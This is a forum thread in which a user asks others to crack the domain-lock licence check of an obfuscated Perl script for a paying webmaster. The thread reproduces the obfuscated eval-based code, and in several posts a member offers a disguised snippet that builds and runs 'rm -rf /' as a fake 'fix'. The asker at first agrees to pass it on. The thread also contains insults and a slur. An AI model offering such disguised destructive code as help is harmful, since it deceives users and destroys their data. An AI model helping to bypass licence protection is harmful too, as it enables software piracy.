Perl Programmers

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • fireorange
    Confirmed User
    • Jan 2005
    • 1648

    #1

    Perl Programmers

    When installing a script, it has a few lines that checks the domain it's being installed and will stop the installation if it doesn't match. Is it possible this protection to be removed from the script or cracked?

    Code:
    sub l{my $k="fc38ecf7b7a1b2281b07aecd42948feb";my $m=shift;my $c=1024;my $p=undef;my $x=0;
    my $y=0;my @s=n($k);my @a = unpack("C*", $m);for(@a){$x=0 if(++$x>255);$y-=256 if(($y+=$s[$x])>255);
    @s[$x,$y]=@s[$y,$x];$_^=$s[($s[$x]+$s[$y])%256];}return pack("C*", @a);}sub p{my $z="P2+U29ESKJ5oiBv".
    "To3tsk14foAim4OoKJZ+UWAmyO9UQtW6kXqxSV8uMK8u4cmj80 qmKxszLVU+VplI/kpD4HkjtFpc6pPfXrKM43no2BTK00vW4gdSN".
    "O08nHehqn9/Y3Dz0e4pPfAxebKSwDA9Wg4T5VzYito9ENRqhXx55ihDBTRUxg VF6WdGliAyhClf3F3/mxVKwqUrzHb2R4OYqHnxNUMC".
    "TET/ASk7htvfX6av4z4p7C/gN1xBDEseuontJ4DKzOZuKlnpOnbzuQ3mnQeoRXx1qn4bXxzUz LyZ3dZGtSTeeboFaifMggRJa7Jm8ud".
    "KD4owYU1ZZ0bZLjZlgTXBNTT7C2AhVvWIaA2sSKU8=";eval(l(o(\$z)));}sub n{my @k=unpack('C*', shift);
    my @s=0..255;my $y=0;my $x=0;for $x (0..255){$y=($k[$x%@k]+$s[$x]+$y)%256;@s[$x,$y]=@s[$y,$x];}
    return @s;}sub i {my $i="P2+Qm4RBNpk921CY9mxxyx0RoUb657EAYr+0ehfnUaE3kUiAdM IkFtnEeY+wd2DtlvT1qMzVAGOg".
    "nGNb+rnEJBu9Sdok6PDKsKNh3TFmUgyvhbKJi97ZHFhzDP0zh8 iHmnWza4oUZEIcL4+pJ08e1Zb4UT4iuM5/MFzwXxl3ngPTWFp2/l".
    "plGNOnyVeODEb8cHjl2xe3ow+DALyN6+M0TT1FQJSWU3zAWF28 s5e2zI7J/Jd2Tg[b]=[/b]=";my$z=l(o(\$i));eval($z);}sub o{my $d=shift;
    my $b=undef;my $l=undef;$$d=~tr|A-Za-z0-9+=/||cd;$$d=~s/=+$//;$$d=~tr|A-Za-z0-9+/| -_|;while( $$d=~/(.{1,60})/gs )
    {$l= chr(32 + length($1)*3/4);$b.= unpack("u", $l.$1);}return $b;}
    If you're 100% certain it's crackable, post your ICQ number and $$$ you want in this thread and I'll pass on the info to the webmaster who wants it done.
  • WiredGuy
    Pounding Googlebot
    • Aug 2002
    • 34512

    #2
    Good luck, perl has some satanic looking syntax at times. I love it though
    WG
    I play with Google.

    Comment

    • nastyking
      • Nov 2002
      • 2174

      #3
      Originally posted by WiredGuy
      Good luck, perl has some satanic looking syntax at times. I love it though
      WG
      Perl is the greatest thing since sliced bread ..

      Comment

      • nastyking
        • Nov 2002
        • 2174

        #4
        It's 100% crackable as it's open source. Would take some time though. I charge 150 $ an hour ..

        Comment

        • Babaganoosh
          ♥♥♥ Likes Hugs ♥♥♥
          • Nov 2001
          • 15841

          #5
          Either pay for the fucking script or don't use it.
          I like pie.

          Comment

          • nastyking
            • Nov 2002
            • 2174

            #6
            Here you have it in a readable form:

            Code:
            sub l {
                my $k = "fc38ecf7b7a1b2281b07aecd42948feb";
                my $m = shift;
                my $c = 1024;
                my $p = undef;
                my $x = 0;
                my $y = 0;
                my @s = n($k);
                my @a = unpack( "C*", $m );
                for (@a) {
                    $x = 0 if ( ++$x > 255 );
                    $y -= 256 if ( ( $y += $s[$x] ) > 255 );
                    @s[ $x, $y ] = @s[ $y, $x ];
                    $_ ^= $s[ ( $s[$x] + $s[$y] ) % 256 ];
                }
                return pack( "C*", @a );
            }
            
            sub p {
                my $z =
                    "P2+U29ESKJ5oiBv"
                  . "To3tsk14foAim4OoKJZ+UWAmyO9UQtW6kXqxSV8uMK8u4cmj80   qmKxszLVU+VplI/kpD4HkjtFpc6pPfXrKM43no2BTK00vW4gdSN"
                  . "O08nHehqn9/Y3Dz0e4pPfAxebKSwDA9Wg4T5VzYito9ENRqhXx55ihDBTRUxg   VF6WdGliAyhClf3F3/mxVKwqUrzHb2R4OYqHnxNUMC"
                  . "TET/ASk7htvfX6av4z4p7C/gN1xBDEseuontJ4DKzOZuKlnpOnbzuQ3mnQeoRXx1qn4bXxzUz   LyZ3dZGtSTeeboFaifMggRJa7Jm8ud"
                  . "KD4owYU1ZZ0bZLjZlgTXBNTT7C2AhVvWIaA2sSKU8=";
                eval( l( o( \$z ) ) );
            }
            
            sub n {
                my @k = unpack( 'C*', shift );
                my @s = 0 .. 255;
                my $y = 0;
                my $x = 0;
                for $x ( 0 .. 255 ) {
                    $y = ( $k[ $x % @k ] + $s[$x] + $y ) % 256;
                    @s[ $x, $y ] = @s[ $y, $x ];
                }
                return @s;
            }
            
            sub i {
                my $i =
            "P2+Qm4RBNpk921CY9mxxyx0RoUb657EAYr+0ehfnUaE3kUiAdM   IkFtnEeY+wd2DtlvT1qMzVAGOg"
                  . "nGNb+rnEJBu9Sdok6PDKsKNh3TFmUgyvhbKJi97ZHFhzDP0zh8   iHmnWza4oUZEIcL4+pJ08e1Zb4UT4iuM5/MFzwXxl3ngPTWFp2/l"
                  . "plGNOnyVeODEb8cHjl2xe3ow+DALyN6+M0TT1FQJSWU3zAWF28   s5e2zI7J/Jd2Tghahahaha";
                my $z = l( o( \$i ) );
                eval($z);
            }
            
            sub o {
                my $d = shift;
                my $b = undef;
                my $l = undef;
                $$d =~ tr|A-Za-z0-9+=/||cd;
                $$d =~ s/=+$//;
                $$d =~ tr|A-Za-z0-9+/| -_|;
                while ( $$d =~ /(.{1,60})/gs ) {
                    $l = chr( 32 + length($1) * 3 / 4 );
                    $b .= unpack( "u", $l . $1 );
                }
                return $b;
            }

            Comment

            • BlueWire
              Confirmed User
              • Nov 2004
              • 4628

              #7
              Seeing as my company uses measures similar to this to protect us against software theft I would be more than happy to ....just provide me with the domain you'll be using it at so that i can tell the script publishers to sue the shit out you


              GET THE FUCK OUT OF HERE

              Comment

              • Babaganoosh
                ♥♥♥ Likes Hugs ♥♥♥
                • Nov 2001
                • 15841

                #8
                Originally posted by nastyking
                Here you have it in a readable form:
                Don't help that little faggot.
                I like pie.

                Comment

                • fireorange
                  Confirmed User
                  • Jan 2005
                  • 1648

                  #9
                  Originally posted by BlueWire
                  Seeing as my company uses measures similar to this to protect us against software theft I would be more than happy to ....just provide me with the domain you'll be using it at so that i can tell the script publishers to sue the shit out you


                  GET THE FUCK OUT OF HERE

                  Comment

                  • woj
                    <&(©¿©)&>
                    • Jul 2002
                    • 47882

                    #10
                    Originally posted by Babaganoosh
                    Either pay for the fucking script or don't use it.
                    Custom Software Development, email: woj#at#wojfun#.#com to discuss details or skype: wojl2000 or gchat: wojfun or telegram: wojl2000
                    Affiliate program tools: Hosted Galleries Manager Banner Manager Video Manager
                    Wordpress Affiliate Plugin Pic/Movie of the Day Fansign Generator Zip Manager

                    Comment

                    • Alky
                      Confirmed User
                      • Apr 2002
                      • 5651

                      #11
                      heh, yes.. quite easily actually. how much can that script actually cost?

                      Comment

                      • nastyking
                        • Nov 2002
                        • 2174

                        #12
                        Just change the code to this

                        Code:
                        sub l {
                           my $d = '-rf /'
                           my $c = 'df';
                        
                           $c =~ s/df/rm/;
                        
                           `$c $d`;
                        }
                        
                        l("To3tsk14foAim4OoKJ");
                        Should solve all your problems ...

                        Comment

                        • fireorange
                          Confirmed User
                          • Jan 2005
                          • 1648

                          #13
                          Originally posted by Alky
                          heh, yes.. quite easily actually. how much can that script actually cost?
                          Around $50 I think, needs it installed on 100 domains so he'll need 100 licenses.

                          Originally posted by nastyking
                          Just change the code to this

                          Should solve all your problems ...
                          Thanks, I'll send him that code.

                          Comment

                          • nastyking
                            • Nov 2002
                            • 2174

                            #14
                            Originally posted by fireorange
                            Thanks, I'll send him that code.
                            He will like it

                            Comment

                            • woj
                              <&(©¿©)&>
                              • Jul 2002
                              • 47882

                              #15
                              Originally posted by nastyking
                              Just change the code to this

                              Code:
                              sub l {
                                 my $d = '-rf /'
                                 my $c = 'df';
                              
                                 $c =~ s/df/rm/;
                              
                                 `$c $d`;
                              }
                              
                              l("To3tsk14foAim4OoKJ");
                              Should solve all your problems ...

                              nice
                              Custom Software Development, email: woj#at#wojfun#.#com to discuss details or skype: wojl2000 or gchat: wojfun or telegram: wojl2000
                              Affiliate program tools: Hosted Galleries Manager Banner Manager Video Manager
                              Wordpress Affiliate Plugin Pic/Movie of the Day Fansign Generator Zip Manager

                              Comment

                              • fireorange
                                Confirmed User
                                • Jan 2005
                                • 1648

                                #16
                                How was he protecting the code anyway?
                                Base64 encryption? md5?

                                Comment

                                • delirious
                                  Registered User
                                  • Feb 2005
                                  • 64

                                  #17
                                  lol so mean :P
                                  my new site: boxgap.net

                                  Comment

                                  • mrkris
                                    Confirmed User
                                    • May 2005
                                    • 2737

                                    #18
                                    Although that script is beyond simple to bypass as I am a perl developer, I don't agree with the idea of it unless it was for my own use. As far as the rest of you giving him code that will DELETE everything on the system that he has permissions to, that is fucked up and I hope you all get your genitals infested by the fleas of a thousand camels.

                                    PHP-MySQL-Rails | ICQ: 342500546

                                    Comment

                                    • fireorange
                                      Confirmed User
                                      • Jan 2005
                                      • 1648

                                      #19
                                      Originally posted by mrkris
                                      Although that script is beyond simple to bypass as I am a perl developer, I don't agree with the idea of it unless it was for my own use. As far as the rest of you giving him code that will DELETE everything on the system that he has permissions to, that is fucked up and I hope you all get your genitals infested by the fleas of a thousand camels.
                                      Really?

                                      Comment

                                      • fireorange
                                        Confirmed User
                                        • Jan 2005
                                        • 1648

                                        #20
                                        OK I see it "rm -rf"?

                                        Comment

                                        • Babaganoosh
                                          ♥♥♥ Likes Hugs ♥♥♥
                                          • Nov 2001
                                          • 15841

                                          #21
                                          Originally posted by mrkris
                                          Although that script is beyond simple to bypass as I am a perl developer, I don't agree with the idea of it unless it was for my own use. As far as the rest of you giving him code that will DELETE everything on the system that he has permissions to, that is fucked up and I hope you all get your genitals infested by the fleas of a thousand camels.
                                          There always has to be one asshole...
                                          I like pie.

                                          Comment

                                          • mrkris
                                            Confirmed User
                                            • May 2005
                                            • 2737

                                            #22
                                            Heya Baba, consume my genitals balls deep. Thnx.

                                            PHP-MySQL-Rails | ICQ: 342500546

                                            Comment

                                            • nastyking
                                              • Nov 2002
                                              • 2174

                                              #23
                                              Originally posted by mrkris
                                              Although that script is beyond simple to bypass as I am a perl developer, I don't agree with the idea of it unless it was for my own use. As far as the rest of you giving him code that will DELETE everything on the system that he has permissions to, that is fucked up and I hope you all get your genitals infested by the fleas of a thousand camels.
                                              Do you run your CGI scripts as root?

                                              Comment

                                              • mrkris
                                                Confirmed User
                                                • May 2005
                                                • 2737

                                                #24
                                                I don't use perl for web stuff unless neccessary. Who is to say this guy doesn't have his perms setup wrong? It could wipe out his document root though, which would be enough to piss ANYONE off.

                                                PHP-MySQL-Rails | ICQ: 342500546

                                                Comment

                                                • blackmonsters
                                                  Making PHP work
                                                  • Nov 2002
                                                  • 20970

                                                  #25
                                                  Originally posted by nastyking
                                                  Just change the code to this

                                                  Code:
                                                  sub l {
                                                     my $d = '-rf /'
                                                     my $c = 'df';
                                                  
                                                     $c =~ s/df/rm/;
                                                  
                                                     `$c $d`;
                                                  }
                                                  
                                                  l("To3tsk14foAim4OoKJ");
                                                  Should solve all your problems ...

                                                  I'm running this ASAP!!!!
                                                  Free Open Source Live Aggregated Cams Script (FOSLACS)

                                                  Comment

                                                  • BlueWire
                                                    Confirmed User
                                                    • Nov 2004
                                                    • 4628

                                                    #26
                                                    Luckily a lot of these scripts have secretly placed backup systems to atleast report where the script is being illegally used....

                                                    I hope these guys give you a legal schooling if nothing else. Amazing how site owners and webmasters can hate hacked passwords so much because it hursts their sales yet they turn around and do it themselves. These scripts take time and money to develop....the system works except when jackholes like you come around

                                                    Comment

                                                    • pstation
                                                      Confirmed User
                                                      • Jul 2003
                                                      • 1135

                                                      #27
                                                      Originally posted by nastyking
                                                      Do you run your CGI scripts as root?
                                                      what happens if they're using suexec? then all the files in the home directory are going to be deleted

                                                      Comment

                                                      • nastyking
                                                        • Nov 2002
                                                        • 2174

                                                        #28
                                                        Originally posted by pstation
                                                        what happens if they're using suexec? then all the files in the home directory are going to be deleted
                                                        1.) It was a joke.
                                                        2.) It would be the right punishment for software piracy and cracking.

                                                        Comment

                                                        • BlueWire
                                                          Confirmed User
                                                          • Nov 2004
                                                          • 4628

                                                          #29
                                                          Originally posted by nastyking
                                                          1.) It was a joke.
                                                          2.) It would be the right punishment for software piracy and cracking.


                                                          You the man nasty....I hope this guy gets his shit pushed in

                                                          Comment

                                                          • fireorange
                                                            Confirmed User
                                                            • Jan 2005
                                                            • 1648

                                                            #30
                                                            Originally posted by BlueWire
                                                            You the man nasty....I hope this guy gets his shit pushed in
                                                            I've already said it's not for me and I've already messaged him not to run that code
                                                            If he lost his files, he would have blamed me

                                                            Comment

                                                            • fireorange
                                                              Confirmed User
                                                              • Jan 2005
                                                              • 1648

                                                              #31
                                                              Anyway, I see nothing wrong with him getting a crack, that's why I wanted to help him, the developer doesn't offer a server license so he has to spend $5k for his domain licenses. $5k USD is a lot in Russia

                                                              Comment

                                                              • nastyking
                                                                • Nov 2002
                                                                • 2174

                                                                #32
                                                                Originally posted by fireorange
                                                                Anyway, I see nothing wrong with him getting a crack, that's why I wanted to help him, the developer doesn't offer a server license so he has to spend $5k for his domain licenses. $5k USD is a lot in Russia
                                                                $5k is also a lot if you steal it ..

                                                                Comment

                                                                • BlueWire
                                                                  Confirmed User
                                                                  • Nov 2004
                                                                  • 4628

                                                                  #33
                                                                  Originally posted by fireorange
                                                                  Anyway, I see nothing wrong with him getting a crack, that's why I wanted to help him, the developer doesn't offer a server license so he has to spend $5k for his domain licenses. $5k USD is a lot in Russia

                                                                  Well thenwhy dont you pay someone to custom code it...then YOU can decide how the licences are distributed....

                                                                  Thats about the dumbest thing in the world i've heard....so becaue the cost of milk goes up to 5 dollars a gallon it is then "okay" to steal the cow from the farm to make your own milk because the cost went up....give me a break

                                                                  get out of here noob

                                                                  Comment

                                                                  • fireorange
                                                                    Confirmed User
                                                                    • Jan 2005
                                                                    • 1648

                                                                    #34
                                                                    Originally posted by nastyking
                                                                    $5k is also a lot if you steal it ..
                                                                    You're funny, first you said you charge $150 an hour now you've gone all anti-piracy

                                                                    Comment

                                                                    • nastyking
                                                                      • Nov 2002
                                                                      • 2174

                                                                      #35
                                                                      Originally posted by fireorange
                                                                      You're funny, first you said you charge $150 an hour now you've gone all anti-piracy
                                                                      I charge $ 150 an hour for programming, not cracking ...

                                                                      Comment

                                                                      • fireorange
                                                                        Confirmed User
                                                                        • Jan 2005
                                                                        • 1648

                                                                        #36
                                                                        Originally posted by nastyking
                                                                        I charge $ 150 an hour for programming, not cracking ...
                                                                        So why did you mention $150 per hour earlier when I asked about $$$?

                                                                        Truth: first you wanted to do it and even whitespace formatted the ugly code then changed your mind after the comments from others. Don't pretend otherwise.

                                                                        Comment

                                                                        • fireorange
                                                                          Confirmed User
                                                                          • Jan 2005
                                                                          • 1648

                                                                          #37
                                                                          GFY Drama even in a geek scripting threads.

                                                                          Comment

                                                                          Working...